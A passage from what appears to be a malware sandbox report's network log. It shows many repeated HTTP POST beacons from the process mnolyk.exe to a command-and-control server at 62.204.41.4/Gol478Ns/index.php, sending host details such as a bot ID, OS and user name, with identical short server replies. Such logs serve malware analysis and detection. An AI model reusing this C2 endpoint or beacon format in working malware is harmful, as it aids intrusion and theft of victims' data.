                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      317192.168.2.75004462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:25.381632090 CET770OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:25.444655895 CET770INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:25 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      318192.168.2.75004562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:25.620163918 CET771OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:25.683967113 CET771INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:25 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      319192.168.2.75004662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:25.862441063 CET772OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:25.927823067 CET772INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:25 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      32192.168.2.74975662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:05.379931927 CET464OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:05.444961071 CET464INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:05 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      320192.168.2.75004762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:26.104922056 CET773OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:26.168797016 CET773INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:26 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      321192.168.2.75004862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:26.342561007 CET774OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:26.407500029 CET774INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:26 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      322192.168.2.75004962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:26.579535961 CET775OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:26.642302036 CET775INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:26 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      323192.168.2.75005062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:26.808862925 CET776OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:26.872878075 CET776INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:26 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      324192.168.2.75005162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:27.043304920 CET777OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:27.109849930 CET777INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:27 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      325192.168.2.75005262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:27.283164024 CET778OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:27.348197937 CET778INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:27 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      326192.168.2.75005362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:27.528345108 CET779OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:27.594378948 CET780INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:27 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      327192.168.2.75005562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:27.766284943 CET787OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:27.832042933 CET787INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:27 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      328192.168.2.75005662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:28.014709949 CET787OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:28.082096100 CET788INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:28 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      329192.168.2.75005762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:28.262419939 CET789OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:28.327377081 CET789INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:28 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      33192.168.2.74975762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:05.614238024 CET464OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:05.678282976 CET465INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:05 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      330192.168.2.75005862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:28.499164104 CET790OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:28.563302040 CET790INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:28 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      331192.168.2.75005962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:28.737025976 CET791OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:28.802062035 CET791INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:28 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      332192.168.2.75006062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:28.997104883 CET792OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:29.066272020 CET792INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:29 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      333192.168.2.75006162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:29.246155977 CET792OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:29.310091972 CET793INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:29 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      334192.168.2.75006262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:29.485224962 CET794OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
